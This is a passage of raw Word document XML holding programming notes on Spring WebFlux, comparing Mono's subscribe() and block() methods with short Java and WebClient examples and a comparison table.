          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC2157" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ypically used when </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you don’t need to return a value immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like logging or side effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7D833" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ono&lt;String&gt; mono = Mono.just("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E1550" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ono.subscribe(value -&gt; System.out.println("Received: " + value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F47069" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Received: Hello (executed asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13893787" w14:textId="77777777" w:rsidR="004A4102"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C434CC0">
          <v:rect id="_x0000_i2301" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223DF2F" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102"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block() – Triggers and waits for the result (synchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535B6D7" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>starts the stream and blocks the thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until it gets the result or completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B40263" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Mostly used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>test cases</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bridging reactive to blocking code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not recommended in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC7738" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ono&lt;String&gt; mono = Mono.just("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B065E82" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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tring result = mono.block();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E647FC8" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ystem.out.println("Result: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708724B3" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Result: Hello (executed synchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B97C969" w14:textId="77777777" w:rsidR="004A4102"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CE44E2B">
          <v:rect id="_x0000_i2302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="591687A7" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102"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3"/>
        <w:gridCol w:w="3226"/>
        <w:gridCol w:w="932"/>
        <w:gridCol w:w="4102"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4D531284" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505EE896" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="640D90F1" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777E4E35" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Blocking?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438B2D3B" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Usage Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4C4C9F84" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FA22E1" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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ubscribe()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4518CBCF" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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tarts reactive flow asynchronously</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="634F9545" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102" w:rsidP="00B13F85">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F1E666F" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Non-blocking flows, service logic, side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="62161218" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32907A13" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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block()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA7ECB0" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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aits and retrieves the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24300836" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102" w:rsidP="00B13F85">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B7C539" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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esting, or bridging to blocking code only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03C0FC43" w14:textId="77777777" w:rsidR="004A4102"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97C188">
          <v:rect id="_x0000_i2303" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A4C24" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102"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Best Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367C497" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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void .block() in production-level reactive apps. It defeats the purpose of non-blocking architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEDA194" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Need a quick example with Flux too?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2E201" w14:textId="6717BDD7" w:rsidR="004A4102" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004A410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1E84644">
          <v:rect id="_x0000_i2304" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27543A15" w14:textId="39D04E95"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10" w:name="_Toc196307990"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When should you use each of these methods</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p w14:paraId="30516DA7" w14:textId="297A2B8F" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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n Spring WebFlux, when working with WebClient to make HTTP requests, you will primarily encounter </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the return types, and you might need to choose between methods like .block(), .subscribe(), and others based on your use case. Here's a breakdown of when to use each method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE874DD" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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 subscribe():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D809EA"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want to perform the action </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without waiting for the response. It allows you to specify a callback that will handle the result once it is available, but it does not block the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590148B9"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214FBEA5" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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When triggering side effects (logging, sending emails, etc.) that do not require waiting for the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5186D4" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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or non-blocking, fire-and-forget operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE200C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20104C92"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C563935"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DD7AA1"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B613D6"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523A5B4"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ubscribe(response -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398B443"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ystem.out.println("Response: " + response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04483CAE"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624CA23C" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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2. block():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F8B0C7"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>block()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>block the current thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wait for the result. This is typically useful when integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-reactive code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or when a synchronous result is needed (e.g., in a non-reactive application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA27D56"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF2B2E" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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You are integrating a reactive client (e.g., WebClient) into a legacy, synchronous system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06183C83" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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hen you need the result immediately and cannot use the reactive flow, like when calling a service inside a synchronous method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD614ED"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Important</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use this sparingly as it negates the advantages of non-blocking reactive programming, and can lead to thread contention and scalability issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDAFCD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E0DF0"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tring response = webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE96816"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114ADACD"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB8B6E5"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D79E2"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block();  // Blocks and waits for the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349B554"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ystem.out.println("Response: " + response);</w:t>
      </w:r>
    </w:p>
